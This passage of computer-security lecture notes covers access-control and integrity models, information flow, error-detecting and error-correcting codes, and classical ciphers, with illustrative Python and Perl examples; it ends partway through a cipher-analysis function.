• No read-up-2: s can read o if and only if s dom o, and s has read access in the access control matrix.

• No write-down-2: s can write o if and only if o dom s, and s has write access in the access control matrix.
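The dominance relation and the two extended properties above, as an added Python example (not from the original notes or the textbook). The subjects, objects, categories and matrix entries are hypothetical values constructed for illustration.

```python
from dataclasses import dataclass

# Classification order from the notes: T > S > C > U.
RANK = {"U": 0, "C": 1, "S": 2, "T": 3}


@dataclass(frozen=True)
class Level:
    """A security level (l, c): a classification plus a set of categories."""
    l: str
    c: frozenset = frozenset()


def dom(a, b):
    """(l, c) dom (l', c') iff l' <= l and c' is a subset of c."""
    return RANK[b.l] <= RANK[a.l] and b.c <= a.c


class BLP:
    def __init__(self, levels, matrix):
        self.levels = levels  # name -> Level, for subjects and objects alike
        self.matrix = matrix  # (subject, object) -> set of rights

    def _allowed(self, s, o, right):
        return right in self.matrix.get((s, o), set())

    def can_read(self, s, o):
        # No read-up-2: s dom o, and read access in the matrix.
        return dom(self.levels[s], self.levels[o]) and self._allowed(s, o, "read")

    def can_write(self, s, o):
        # No write-down-2: o dom s, and write access in the matrix.
        return dom(self.levels[o], self.levels[s]) and self._allowed(s, o, "write")

    def state_is_secure(self, accesses):
        """A state is secure if every current access satisfies both properties."""
        check = {"read": self.can_read, "write": self.can_write}
        return all(check[mode](s, o) for s, o, mode in accesses)


# Constructed example system; every name below is hypothetical.
LEVELS = {
    "analyst": Level("S", frozenset({"NUC"})),
    "clerk": Level("U"),
    "plans": Level("S", frozenset({"NUC"})),
    "eur_report": Level("S", frozenset({"EUR"})),
    "memo": Level("U"),
}
MATRIX = {
    ("analyst", "plans"): {"read", "write"},
    ("analyst", "eur_report"): {"read"},
    ("analyst", "memo"): {"read", "write"},
    ("clerk", "plans"): {"read", "write"},
    ("clerk", "memo"): {"read"},
}
SYSTEM = BLP(LEVELS, MATRIX)


def trojan_copy_allowed(system, subject, secret, public):
    """A Trojan horse running as `subject` needs read on `secret` and write on `public`."""
    return system.can_read(subject, secret) and system.can_write(subject, public)


if __name__ == "__main__":
    print("analyst reads plans:      ", SYSTEM.can_read("analyst", "plans"))
    print("analyst reads eur_report: ", SYSTEM.can_read("analyst", "eur_report"))
    print("analyst writes memo:      ", SYSTEM.can_write("analyst", "memo"))
    print("clerk reads plans:        ", SYSTEM.can_read("clerk", "plans"))
    print("trojan copy plans -> memo:", trojan_copy_allowed(SYSTEM, "analyst", "plans", "memo"))
```

The matrix grants the analyst write access to the memo and the clerk read access to the plans, yet both are refused: the matrix entry is necessary but the level check decides. The two Secret levels with different categories are incomparable, which is why the levels form a lattice rather than a total order.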


BLP security

A system is considered secure in the current state if all the current accesses are permitted by the two properties.

A transition from one state to the next is considered secure if it goes from one secure state to another secure state.

The basic security theorem stated in Theorem 5-2 in the textbook states that if the initial state of a system is secure, and if all state transitions are secure, then the system will always be secure.


BLP example

From textbook, p128:

DG UNIX uses access controls and BLP-like behaviour


BLP limits

BLP is a static model, not providing techniques for changing access rights or security levels [4], and there is an exploration and discussion into the limitations of this sort of security modelling in section 5.4 of the textbook.

However the model does demonstrate initial ideas into how to model, and how to build security systems that are provably secure.

[4] You might want to explore the Harrison-Ruzzo-Ullman model for this capability.


Biba model, integrity

Trustworthiness of data and programs - assurance for integrity services.

Levels like clean or dirty (in reference to database entries).

Biba model (chapter 6.2) is a kind of dual for Bell-LaPadula: integrity vs confidentiality.


Biba levels

The integrity levels I are ordered as for the security levels

Function i : O → I (i : S → I) which returns the integrity level of an object (subject).


Biba properties

The properties/rules for the main (static) Biba model are:

• No read-down: s can read o iff i(s) ≤ i(o).

• No write-up: s can write o iff i(o) ≤ i(s).

• No invoke-up: $s_1$ can execute $s_2$ iff $i(s_2) \le i(s_1)$.


Biba - dynamic

Biba models can also handle dynamic integrity levels, where the level of a subject reduces if it accesses an object at a lower level (in other words it has got dirty). The low-watermark policies are:

• No write-up: s can write o iff i(o) ≤ i(s).

• Subject lowers: if s reads o then i′(s) = min(i(s), i(o)).

• No invoke-up: $s_1$ can execute $s_2$ iff $i(s_2) \le i(s_1)$.


Biba - ring

Finally, we have a ring policy,

• All read: s can read o regardless.

• No write-up: s can write o if and only if i(o) ≤ i(s).

• No invoke-up: $s_1$ can execute $s_2$ if and only if $i(s_2) \le i(s_1)$.

Each of these policies has an application in some area. Example in textbook, p155 (LOCUS OS)


Clark-Wilson, integrity

Transactions defined through certification rules.

The Clark-Wilson model has the following terminology:

Term  Definition
CDI   Constrained Data Item (data subject to control)
UDI   Unconstrained Data Item (data not subject to control)
IVP   Integrity Verification Procedures (for testing correct CDIs)
TP    Transformation Procedures (for transforming the system)


Chapter 6

Lecture 6 - Errors


Assignment 1

Form your groups,

Select your project,

Email me with your proposal for approval


Assignment 1

Literature review - not a survey :(

Formal paper - format in either word.zip or latex2e.zip in http://www.comp.nus.edu.sg/~cs3235/2003-semesterI/

Heading, Author(s), abstract (?), Introduction, body of paper, Summary/Conclusion, References

10-50 pages, 5-50 references


Assignment 2

More detailed, in-depth study

Not necessarily a software development project

Comparison, research, idea, program


Mid semester Test

9th October 2003

LT27, 14:30

MCQ, closed book

Covers everything up to the lecture before...


Last session

• Channel properties

• Entropy

• Models


This session

• Information flow

• Simple error detection

• Simple error correction

• Encryption


Information flow (Chapter 16)

We may also more abstractly model some security policies by considering the flow of information in a system.

We can use entropy to formalize this.

In this context, we can establish quantitative results about information flow in a system, rather than just making absolute assertions [5].

[5] For example, “System X reveals no more than 25% of the input values”.


Information flow

In the textbook we have a definition of information flow based on the conditional entropy H(x | y) of some x given y:

Definition 16-1. The command sequence c causes a flow of information from x to y′ if H(x | y′) < H(x | y). If y does not exist in s then H(x | y) = H(x).

We can use this to detect implicit flows of information, not just explicit ones in which we directly modify an object.


Information flow

Consider the example on page 409 of the textbook:

    if x = 1 then
        y := 0
    else
        y := 1;

After this code segment, we can determine if x = 1 from y′ even though we do not ever assign y′ directly from some function of x. In other words we have an implicit flow of information from x to y′.


Information flow

Formal treatment by considering the entropy of x. If the likelihood of x = 1 is 0.5, then H(x) = 1. We can also deduce that H(x | y′) = 0, and so

$$H(x \mid y') < H(x \mid y) = H(x) = 1$$

and information is flowing from x to y′. Paper gives some background.
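The entropy argument above, worked as an added Python example (not from the notes or the textbook): it computes H(x) and H(x | y′) from the joint distribution a program induces and reports how many bits reach y′. The four-valued inputs, the constant program and the x mod 2 program are constructed cases that go beyond the slide to show partial and zero flows.

```python
import math
from collections import defaultdict


def entropy(dist):
    """H(x) in bits for a distribution given as {value: probability}."""
    return sum(p * math.log2(1 / p) for p in dist.values() if p > 0)


def conditional_entropy(x_dist, program):
    """H(x | y') where y' = program(x) and x is drawn from x_dist."""
    joint = defaultdict(float)   # (x, y') -> probability
    y_marg = defaultdict(float)  # y' -> probability
    for x, p in x_dist.items():
        y = program(x)
        joint[(x, y)] += p
        y_marg[y] += p
    # H(x | y') = sum over (x, y') of p(x, y') * log2( p(y') / p(x, y') )
    return sum(p * math.log2(y_marg[y] / p) for (_, y), p in joint.items() if p > 0)


def flow_bits(x_dist, program):
    """Bits of information about x that reach y': H(x) - H(x | y').

    y does not exist before the program runs, so H(x | y) = H(x) as in
    Definition 16-1; a positive result means information flows from x to y'.
    """
    return entropy(x_dist) - conditional_entropy(x_dist, program)


def slide_program(x):
    # if x = 1 then y := 0 else y := 1   (implicit flow, no assignment from x)
    return 0 if x == 1 else 1


def constant_program(x):
    # y := 7 regardless of x (constructed: no flow)
    return 7


def parity_program(x):
    # y := x mod 2 (constructed: explicit but partial flow)
    return x % 2


COIN = {0: 0.5, 1: 0.5}                       # the slide's case
FOUR = {0: 0.25, 1: 0.25, 2: 0.25, 3: 0.25}   # constructed

if __name__ == "__main__":
    for name, dist, prog in [
        ("slide, x in {0,1}", COIN, slide_program),
        ("slide, x in {0..3}", FOUR, slide_program),
        ("x mod 2, x in {0..3}", FOUR, parity_program),
        ("constant, x in {0..3}", FOUR, constant_program),
    ]:
        print("%-22s H(x)=%.3f  H(x|y')=%.3f  flow=%.3f bits" % (
            name, entropy(dist), conditional_entropy(dist, prog), flow_bits(dist, prog)))
```

For the slide's case the whole bit of x reaches y′; with four equally likely values the same program reveals about 0.81 of the 2 bits.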


Confinement and covert channels

The confinement problem is one of preventing a system from leaking (possibly partial) information.

Sometimes a system can have an unexpected path of transmission of data, termed a covert channel, and through the use of this covert channel information may be leaked either by a malicious program, or by accident.


Confinement and covert channels

Consider the set of permissions on a file.

An unscrupulous program could modify these permissions cyclically to transmit a very-low data-rate message to another unscrupulous program.


Confinement and covert channels

We categorize covert channels into two:

1. Storage channels: using the presence or absence of objects

2. Timing channels: the speed of events

We can attempt to identify covert channels by building a shared resource matrix, determining which processes can read and write which resources.


Attacks on databases

Governing body may keep secret individual information, but release cumulative information

For example: Today’s average temperature of SOC staff by nationality:

Singaporean  Malaysian  PRC   Poland  German  Australian  New Zealand  ....
36.8         36.7       36.9  37.1    36.5    38.2        38.1         ....


Attacks on databases

OK - doesn’t release any sensitive information, but

what if another part of the database released the numbers of SOC staff by nationality...

Singaporean  Malaysian  PRC  Poland  German  Australian  New Zealand  ....
23           12         14   3       5       4           1            ....

By inference you can deduce that the temperature of a particular individual is too high!


This session

• Information flow

• Simple error detection

• Simple error correction

• Encryption


Simple check codes

Transmit data:

1 65 3 22 47 2

Transmit data+checksum:

1 65 3 22 47 2 140


One-way parity

A       0 1 0 0 0 0 0 1
0       0 0 1 1 0 0 0 0
D       0 1 0 0 0 1 0 0
B       0 1 0 0 0 0 1 0
B       0 1 0 0 0 0 1 0
C       0 1 0 0 0 0 1 1

Check:  0 1 1 1 0 1 1 0


Two way parity

A       0 1 0 0 0 0 0 1   0
0       0 0 1 1 0 0 0 0   0
D       0 1 0 0 0 1 0 0   0
B       0 1 0 0 0 0 1 0   0
B       0 1 0 0 0 0 1 0   0
C       0 1 0 0 0 0 1 1   1

Check:  0 1 1 1 0 1 1 0   X


Simple check codes

Parity of bits - detects all 1 bit errors, but...

Horizontal and vertical parity - better, but problems with repetitive errors

Sum of values - problems with repetitive errors

Want better level of error checking


Cyclic redundancy check codes

Treat the stream of transmitted bits as a representation of a polynomial with coefficients of 1:

$$10110 = x^4 + x^2 + x^1 = F(x)$$

Checksum bits are added to ensure that the final composite stream of bits is divisible by some other polynomial g(x).


Cyclic redundancy check codes

We can transform any stream F(x) into a stream T(x) which is divisible by g(x).

If there are errors in T(x), they take the form of a difference bit string E(x) and the final received bits are T(x) + E(x).

When the receiver gets a correct stream, it divides it by g(x) and gets no remainder.


Cyclic redundancy check codes

The question is: How likely is it that T(x) + E(x) will also divide with no remainder?

Single bits? - No. A single bit error means that E(x) will have only one term ($x^{1285}$ say). If the generator polynomial has $x^n + \dots + 1$ it will never divide evenly.

Multiple bits? - Various generator polynomials are used with different properties. Must have one factor of the polynomial being $x^1 + 1$, because this ensures that all odd numbers of bit errors (1,3,5,7...) are detected.


Some common generators:

• CRC-12 - $x^{12} + x^{11} + x^3 + x^2 + x^1 + 1$

• CRC-16 - $x^{16} + x^{15} + x^2 + 1$

• CRC-32 - $x^{32} + x^{26} + x^{23} + x^{22} + x^{16} + x^{12} + x^{11} + x^{10} + x^8 + x^7 + x^5 + x^4 + x^2 + 1$

• CRC-CCITT - $x^{16} + x^{12} + x^5 + 1$


Long division is easy!

Generator g(x): $x^5 + x^2 + 1$ (100101) and F(x): 101101011.

Divide F(x) by g(x), and the remainder is appended to F(x) to give T(x):

                  1010.01000
    100101 ) 101101011.00000
             100101
               100001
               100101
                  1001.00
                  1001.01
                        1000

T(x) = 10110101101000.


Long division is easy!

When this stream is received, it is divided but now will have no remainder if the stream is received without errors.

[Figure: shift register of five D-type stages (D0 to D4) driven by Data and Clock, with two XOR gates.]


Long division is easy!

Input data   D4 D3 D2 D1 D0   Note
...          0  0  0  0  0    Initial state
1            0  0  0  0  1    First bit
0            0  0  0  1  0    Second bit
1            0  0  1  0  1    Third bit
1            0  1  0  1  1
0            1  0  1  1  0
1            0  1  0  0  0
0            1  0  0  0  0
1            0  0  1  0  0
...


Long division is easy!

Input data   D4 D3 D2 D1 D0   Note
...
1            0  1  0  0  1
0            1  0  0  1  0
0            0  0  0  0  1
0            0  0  0  1  0
0            0  0  1  0  0
0            0  1  0  0  0
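The long division and the shift-register table above can be reproduced in a few lines. This Python is an added example, not part of the original lecture notes; it uses the slides' g(x) = 100101 and F(x) = 101101011, and the function names are illustrative.

```python
"""CRC as GF(2) long division, using the slides' g(x) and F(x)."""

GEN = "100101"        # g(x) = x^5 + x^2 + 1, from the slides
FRAME = "101101011"   # F(x), from the slides


def poly_mod(bits: str, gen: str = GEN) -> str:
    """Remainder of bits / gen by XOR long division (len(gen) - 1 bits)."""
    r = len(gen) - 1
    work = [int(b) for b in bits]
    for i in range(len(work) - r):
        if work[i]:                        # leading 1: "subtract" g(x) by XOR
            for j, g in enumerate(gen):
                work[i + j] ^= int(g)
    return "".join(str(b) for b in work[-r:])


def crc_append(frame: str, gen: str = GEN) -> str:
    """T(x): the frame followed by the remainder of frame * x^r / g(x)."""
    r = len(gen) - 1
    return frame + poly_mod(frame + "0" * r, gen)


def crc_ok(stream: str, gen: str = GEN) -> bool:
    """Receiver's check: an undamaged T(x) divides with no remainder."""
    return "1" not in poly_mod(stream, gen)


def lfsr_states(bits: str, gen: str = GEN) -> list:
    """Register contents (D4..D0 for the slides' g) after each clocked bit."""
    r = len(gen) - 1
    taps = int(gen[1:], 2)                 # feedback taps: low r coefficients
    reg, states = 0, []
    for b in bits:
        feedback = (reg >> (r - 1)) & 1    # bit about to be shifted out
        reg = ((reg << 1) & ((1 << r) - 1)) | int(b)
        if feedback:
            reg ^= taps
        states.append(format(reg, "0{}b".format(r)))
    return states


def add_error(stream: str, error: str) -> str:
    """Received bits T(x) + E(x): XOR of two equal-length bit strings."""
    return "".join(str(int(a) ^ int(b)) for a, b in zip(stream, error))


if __name__ == "__main__":
    t = crc_append(FRAME)
    print("T(x)             :", t)
    print("receiver accepts :", crc_ok(t))
    for state in lfsr_states(FRAME + "00000"):
        print("   ", " ".join(state))
    one_bit = "0" * 6 + "1" + "0" * 7      # E(x) with a single term
    print("1-bit error seen :", not crc_ok(add_error(t, one_bit)))
    multiple = GEN + "0" * 8               # E(x) = g(x) * x^8
    print("E = g*x^8 missed :", crc_ok(add_error(t, multiple)))
```

The last case shows the limit of the check: any error pattern that is itself a multiple of g(x) leaves the remainder at zero.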


Case study: ethernet

Ethernet is used for networking computers, principally because of its speed and low cost. The maximum size of an ethernet frame is 1514 bytes [6], and a 32-bit FCS is calculated over the full length of the frame.

The FCS used is:

• CRC-32 - $x^{32} + x^{26} + x^{23} + x^{22} + x^{16} + x^{12} + x^{11} + x^{10} + x^8 + x^7 + x^5 + x^4 + x^2 + 1$

[6] 1500 bytes of data, a source and destination address each of six bytes, and a two byte type identifier. The frame also has a synchronizing header and trailer which is not checked by a CRC.


This session

• Information flow

• Simple error detection

• Simple error correction

• Encryption


Simple error correction

Methods used to correct errors:

• Ignore errors, while acknowledging correct data. ARQ (for Automatic Repeat reQuest).

• Error correcting codes (for computer memory)


Code types

We can divide error correcting codes (ECC) into continuous and block-based types. Convolutional encodings are used for continuous systems, and the common block-based codes are:

• Hamming codes (for correcting single bit errors),

• Golay codes (for correcting up to three bit errors), and

• Bose-Chaudhuri-Hocquenghem (BCH) codes (for correcting block errors).


Combining error correcting codes

Different types of error correcting codes can be combined to produce composite codes.

For example, Reed-Solomon block-codes are often combined with convolutional codes to improve all-round performance.

In this combined setup, the convolutional code corrects randomly distributed bit errors but not bursts of errors while the Reed-Solomon code corrects the burst errors.


Accepting bad data

Sometimes we are willing to accept bad data...


BER and noise

System                        Error rate (errors/bit)
Wiring of internal circuits   $10^{-15}$
Memory chips                  $10^{-14}$
Hard disk                     $10^{-9}$
Optical drives                $10^{-8}$
Coaxial cable                 $10^{-6}$
Optical disk (CD)             $10^{-5}$
Telephone System              $10^{-4}$


BER and noise

We can determine the theoretical channel capacity knowing the SNR:

• BER is 0.01, channel capacity C ≈ 0.92 bits/symbol.

• BER is 0.001, channel capacity C ≈ 0.99 bits/symbol.

• BER is 0, channel capacity C = 1 bits/symbol.

The theoretical maximum channel capacity is quite close to the perfect channel capacity, even if the BER is high.


Reducing BER

Increase the signal (power), or

Reduce the noise (often not possible), or

Use ECC.

The benefit of error correcting codes is that they can improve the received BER without increasing the transmitted power. This performance improvement is measured as a system gain.


Reducing BER

Example: Consider a system without ECC giving a BER of 0.001 with a S/N ratio of 30dB (1000:1). If we were to use an ECC codec, we might get the same BER of 0.001 with a S/N ratio of 20dB (100:1). We say that the system gain due to ECC is 10dB (10:1).


Bad ECC scheme: repetition

An initial scheme to correct transmission errors might be to just repeat bits [7].

Data:     0 1 0 0 1 1 1 1 ...
Transmit: 000111000000111111111111...

If we send three identical bits for every bit we wish to transmit, we can then use a voting system to determine the most likely bit. If our natural BER due to noise was 0.01, with three bits we would achieve a synthetic BER of 0.0001, but our channel capacity is reduced to about C = 0.31 bits/symbol.

[7] Note: there is no point in repeating bits twice. You must repeat three times, or 5 times, and then vote to decide the best value.


Bad ECC scheme: repetition

We can see from this that the rate of transmission using repetition has to approach zero to achieve more and more reliable transmission.

However we know that the theoretical rate should be equal to or just below the channel capacity C.

Convolutional and other encodings can achieve rates of transmission close to the theoretical maximum.


ECC scheme: Hamming

Hamming codes are block-based error correcting codes.

We add hamming bits to a string

Here we derive the inequality used to determine how many extra hamming bits are needed for an arbitrary bit string.


ECC scheme: Hamming

The hamming distance is a measure of how FAR apart two bit strings are.

A:       0 1 0 1 1 1 0 0 0 1 1 1
B:       0 1 1 1 1 1 1 0 0 1 0 1
A XOR B: 0 0 1 0 0 0 1 0 0 0 1 0


ECC scheme: Hamming

If we had two bit strings X and Y representing two characters, and the hamming distance between any two codes was d, we could turn X into Y with d single bit errors.

• If we had an encoding scheme (for say ASCII characters) and the minimum hamming distance between any two codes was d + 1, we could detect d single bit errors [8].

• We can correct up to d single bit errors in an encoding scheme if the minimum hamming distance is 2d + 1.

[8] Because the code d bits away from a correct code is not in the encoding.


ECC scheme: Hamming

If we now encode m bits using r extra hamming bits to make a total of n = m + r, we can count how many correct and incorrect hamming encodings we should have. With m bits we have $2^m$ unique messages - each with n illegal encodings, and:

$(n + 1)2^m \le 2^n$

$(m + r + 1)2^m \le 2^n$

$m + r + 1 \le 2^{n-m}$

$m + r + 1 \le 2^r$


ECC scheme: Hamming

We solve this inequality, and then choose R, the next integer larger than r.

Example: If we wanted to encode 8 bit values (m = 8) and be able to recognise single bit errors:

$8 + r + 1 \le 2^r$

$9 \le 2^r - r$

$r \approx 3.5$

$R = 4$
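The inequality and the distance rule above, worked through for the 8-bit case. This Python is an added example, not part of the original notes; placing the check bits at positions 1, 2, 4 and 8 is the conventional layout and is an assumption here, as are the function names.

```python
"""Hamming check bits from the slides' inequality, plus single-error correction."""


def hamming_distance(a: str, b: str) -> int:
    """Number of positions at which two equal-length bit strings differ."""
    if len(a) != len(b):
        raise ValueError("bit strings must have equal length")
    return sum(x != y for x, y in zip(a, b))


def check_bits_needed(m: int) -> int:
    """Smallest integer r with m + r + 1 <= 2**r."""
    r = 1
    while m + r + 1 > 2 ** r:
        r += 1
    return r


def is_data_position(pos: int) -> bool:
    """Positions count from 1; powers of two are reserved for check bits."""
    return pos & (pos - 1) != 0


def hamming_encode(data: str) -> str:
    """Spread data over the non-power-of-two positions and fill in parity."""
    m = len(data)
    r = check_bits_needed(m)
    n = m + r
    code = [0] * (n + 1)                   # index 0 unused
    bits = iter(data)
    for pos in range(1, n + 1):
        if is_data_position(pos):
            code[pos] = int(next(bits))
    for k in range(r):
        p = 1 << k                         # check bit p covers positions with bit k set
        code[p] = sum(code[pos] for pos in range(1, n + 1) if pos & p) % 2
    return "".join(str(b) for b in code[1:])


def hamming_correct(word: str):
    """Return (data, error_position); position 0 means no error was seen."""
    syndrome = 0
    for pos, bit in enumerate(word, start=1):
        if bit == "1":
            syndrome ^= pos                # XOR of the positions holding a 1
    if syndrome > len(word):
        raise ValueError("more than one bit in error")
    bits = list(word)
    if syndrome:
        bits[syndrome - 1] = "0" if bits[syndrome - 1] == "1" else "1"
    data = "".join(b for pos, b in enumerate(bits, start=1)
                   if is_data_position(pos))
    return data, syndrome


if __name__ == "__main__":
    print("check bits for m = 8:", check_bits_needed(8))
    word = hamming_encode("10110101")      # constructed sample byte
    print("codeword            :", word)
    damaged = word[:5] + ("0" if word[5] == "1" else "1") + word[6:]
    print("damaged             :", damaged)
    print("corrected           :", hamming_correct(damaged))
```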


Reed-Solomon codes

Reed-Solomon codes are block-based error correcting codes which are particularly good at correcting bursts (sequences) of bit errors.

They are found in a wide range of digital communications and storage applications.

Reed-Solomon codes are used to correct errors in digital wireless applications such as wireless LAN systems, and low Earth orbit (LEO) satellite communication systems.


Reed-Solomon codes

A Reed-Solomon code is specified as

• RS(n,k) with s-bit symbols.

This means that the encoder takes k data symbols of s bits each and adds parity symbols to make an n symbol codeword. There are n − k parity symbols of s bits each.

A Reed-Solomon decoder can correct up to t symbols that contain errors in a codeword, where

$2t = n - k$


Reed-Solomon code

Example: A popular Reed-Solomon code is RS(255,223) with 8-bit symbols. Each codeword contains 255 code word bytes, of which 223 bytes are data and 32 bytes are parity. In this example, n = 255, k = 223, and s = 8.

$2t = 32$

and so t = 16

The Reed-Solomon decoder in this example can correct any 16 symbol errors in the codeword.


Chapter 7

Lecture 7 - Encryption


Mid semester Test

9th October 2003

LT27, 14:30

MCQ, closed book

Covers everything up to the lecture before...


Last session

• Information flow

• Simple error detection

• Simple error correction


This session

• Finish on error correction

• Encryption

– Symmetric keys
  ∗ DES

– Public keys
  ∗ RSA


Key points from last week

Error detection vs Error correction

Mathematical analysis

Error rate, noise, channel capacity

Theoretical vs actual channel capacity


This session

• Finish on error correction

• Encryption

– Symmetric keys
  ∗ DES

– Public keys
  ∗ RSA


Convolutional codes

Convolutional codes operate continuously and so are especially useful in data transmission systems.

The convolutional encoder operates on a continuous stream of data using a shift-register to produce a continuous encoded output stream.


Convolutional codes

[Figure: convolutional encoder built from shift-register (S/R) stages, with Data In and Data Out.]

Received bit sequence can be examined for the most likely correct output sequence


Trellis diagram

[Figure: trellis diagram over states A, B, C and D, with branches labelled by the output bit pairs 00, 01, 10 and 11.]


Most likely path

If we were to input the sequence 011010, we would get the following trace through the trellis, with the bit sequence output as 001110110101:

[Figure: path through the trellis states A, B, C and D for this input.]


Convolutional codes

Determine the most likely path, even with large numbers of bit errors.

A convolutional encoding can often reduce errors by a factor of $10^2$ to $10^3$.


Viterbi decoding

The Viterbi algorithm tries to find the most likely received data sequence, by keeping track of the four most likely paths through the trellis.

For each path, a running count of the hamming distance between the received sequence and the path is maintained.

The most likely received string is the one with the lowest hamming distance.
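A small encoder and Viterbi decoder for a four-state code, as an added example that is not part of the original notes. The tap arrangement (output pair u XOR s2, u XOR s1, where s1 and s2 are the two previous input bits) is an assumption, chosen because it reproduces the 011010 to 001110110101 example given earlier; the function names are illustrative.

```python
"""Four-state convolutional encoder and Viterbi decoder (hard decisions)."""


def branch_output(u: int, s1: int, s2: int) -> str:
    """Two output bits for input u in state (s1, s2). Assumed taps."""
    return "{}{}".format(u ^ s2, u ^ s1)


def encode(bits: str) -> str:
    """Run the shift register from the all-zero state."""
    s1 = s2 = 0
    out = []
    for ch in bits:
        u = int(ch)
        out.append(branch_output(u, s1, s2))
        s1, s2 = u, s1                     # shift the register
    return "".join(out)


def viterbi_decode(received: str):
    """Return (most likely input bits, hamming distance of that path)."""
    pairs = [received[i:i + 2] for i in range(0, len(received), 2)]
    # One survivor per state: state -> (running distance, decoded bits).
    survivors = {(0, 0): (0, "")}
    for pair in pairs:
        candidates = {}
        for (s1, s2), (dist, path) in survivors.items():
            for u in (0, 1):
                expected = branch_output(u, s1, s2)
                d = dist + sum(a != b for a, b in zip(expected, pair))
                state = (u, s1)
                # Keep only the closest path arriving at each state.
                if state not in candidates or d < candidates[state][0]:
                    candidates[state] = (d, path + str(u))
        survivors = candidates             # at most four paths are kept
    dist, path = min(survivors.values())
    return path, dist


if __name__ == "__main__":
    sent = encode("011010")
    print("encoded :", sent)
    damaged = sent[:3] + ("0" if sent[3] == "1" else "1") + sent[4:]
    print("received:", damaged)
    print("decoded :", viterbi_decode(damaged))
```

With this short unterminated stream, an error in the final output pair cannot be resolved, because two paths that differ only in the last input bit are equally close to the received bits.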


This session

• Finish on error correction

• Encryption

– Symmetric keys
  ∗ DES

– Public keys
  ∗ RSA


Encryption and authentication

Security and Cryptographic systems act to reduce failure of systems due to the following threats:

Interruption - attacking the availability of a service (Denial of Service).

Interception - attacks confidentiality.

Modification - attacks integrity.

Fabrication - attacks authenticity. Note that you may not need to decode a signal to fabricate it - you might just record and replay it.


Encoding and deciphering

I could have told her the truth - that the same calculation which had served me for deciphering the manuscript had enabled me to learn the word - but on a caprice it struck me to tell her that a genie had revealed it to me. This false disclosure fettered Madame d’Urfé to me. That day I became the master of her soul, and I abused my power.

We call these systems symmetric key systems...


Symmetric key systems

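[Figure: symmetric key system. Plaintext P passes through X under key Ki to give Ki[P], which passes through X under the same key Ki to give plaintext P again.]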


Simple ciphers - transposition

Transposition ciphers just re-order the letters of the original message. This is known as an anagram:

• parliament is an anagram of partial men

• Eleven plus two is an anagram of Twelve plus one

Perhaps you would like to see if you can unscramble “age prison”, or “try open”.


Transposition

Detect a transposition cipher with the frequencies of the letters, and letter pairs.

If the frequency of single letters in ciphertext is correct, but the frequencies of letter pairs is wrong, then the cipher may be a transposition.

This sort of analysis can also assist in unscrambling a transposition ciphertext, by arranging the letters in their letter pairs.


Simple ciphers - substitution

Substitution cipher systems encode the input stream using a substitution rule.

The Cæsar cipher is an example of a simple substitution cipher system, but it can be cracked in at most 25 attempts by just trying each of the 25 values in the keyspace.


Substitution

Code   Encoding
A      Q
B      V
C      X
D      W
...    ...

If the mapping was more randomly chosen it is called a monoalphabetic substitution cipher, and the keyspace for encoding 26 letters would be 26! − 1 = 403,291,461,126,605,635,583,999,999.


Substitution

If we could decrypt 1,000,000 messages in a second, then the average time to find a solution would be about 6,394,144,170,576 years!

We might be lulled into a sense of security by these big numbers, but of course this sort of cipher can be subject to frequency analysis.


Frequency analysis

In the English language, the most common letters are: "E T A O N I S H R D L U..." (from most to least common), and we may use the frequency of the encrypted data to make good guesses at the original plaintext.

We may also look for digrams and trigrams (th, the).


Vigenère

The Vigenère cipher is a polyalphabetic substitution cipher invented around 1520.

We use an encoding/decoding sheet, called a tableau, and a keyword or key sequence.


Vigenère

      A   B   C   D   E   F   G   H   ...
A     A   B   C   D   E   F   G   H   ...
B     B   C   D   E   F   G   H   I   ...
C     C   D   E   F   G   H   I   J   ...
D     D   E   F   G   H   I   J   K   ...
E     E   F   G   H   I   J   K   L   ...
F     F   G   H   I   J   K   L   M   ...
G     G   H   I   J   K   L   M   N   ...
H     H   I   J   K   L   M   N   O   ...
...   ... ... ... ... ... ... ... ... ...


Vigenère

If our keyword was BAD, then encoding HAD A FEED would result in

Key      B A D B A D B A
Text     H A D A F E E D
Cipher   I A G B F H F D

If we can discover the length of the repeated key (in this case 3), and the text is long enough, we can just consider the cipher text to be a group of interleaved monoalphabetic substitution ciphers and solve accordingly.


Analysis

The index of coincidence is the probability that two randomly chosen letters from the cipher will be the same, and it can help us discover the length of a key:

$$IC = \frac{1}{N(N-1)} \sum_{i=0}^{25} F_i (F_i - 1)$$

where $F_i$ is the frequency of the occurrences of symbol i and N is the length of the cipher.


Index of coincidence

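    #!/usr/bin/perl
    # Count how often the text matches a copy of itself rotated by $skip letters.
    $skip = $ARGV[0] ;
    @text = <STDIN> ;
    $all = join('', @text) ;
    $all =~ tr/a-z/A-Z/ ;                        # fold to upper case
    $all =~ tr/A-Z//cd ;                         # delete everything except A-Z
    $header = substr($all, 0, $skip) ;
    $shifted = substr($all, $skip) . $header ;   # rotate left by $skip
    @alltxt = split(//, $all) ; @shiftxt = split(//, $shifted) ;
    $count = 0 ;
    foreach $i (0..$#alltxt) {
        if ($alltxt[$i] eq $shiftxt[$i]) { $count++ ; }
    }
    # Divide by the number of letters compared (scalar(@alltxt), not $#alltxt).
    printf("Index of Coincidence is: %2f\n", $count / scalar(@alltxt)) ;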

Show analysis using shifts of 1...2...3...
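The formula from the previous slide and the shifted comparison the Perl script performs, side by side, as an added Python example that is not part of the original notes. It reuses the BAD / HAD A FEED example from the Vigenère slide; the function names and the sample plaintext are constructed for illustration.

```python
"""Index of coincidence and key-length search for a Vigenere ciphertext."""
from collections import Counter
import string

A = ord("A")


def letters_only(text: str) -> str:
    """Upper-case the text and drop everything except A-Z."""
    return "".join(c for c in text.upper() if c in string.ascii_uppercase)


def vigenere_encrypt(plain: str, key: str) -> str:
    """Add the repeating key to the plaintext letters, modulo 26."""
    plain, key = letters_only(plain), letters_only(key)
    return "".join(
        chr((ord(p) - A + ord(key[i % len(key)]) - A) % 26 + A)
        for i, p in enumerate(plain)
    )


def index_of_coincidence(text: str) -> float:
    """IC = sum F_i (F_i - 1) / (N (N - 1)), the formula on the slide."""
    text = letters_only(text)
    n = len(text)
    if n < 2:
        raise ValueError("need at least two letters")
    return sum(f * (f - 1) for f in Counter(text).values()) / (n * (n - 1))


def shifted_coincidence(text: str, shift: int) -> float:
    """Fraction of positions where the text matches itself rotated by shift."""
    text = letters_only(text)
    rotated = text[shift:] + text[:shift]
    return sum(a == b for a, b in zip(text, rotated)) / len(text)


def likely_key_length(cipher: str, max_len: int) -> int:
    """Shift with the highest coincidence rate (first one on a tie)."""
    return max(range(1, max_len + 1),
               key=lambda k: shifted_coincidence(cipher, k))


def column_ics(cipher: str, key_len: int) -> list:
    """IC of each interleaved column; each is monoalphabetic if key_len is right."""
    text = letters_only(cipher)
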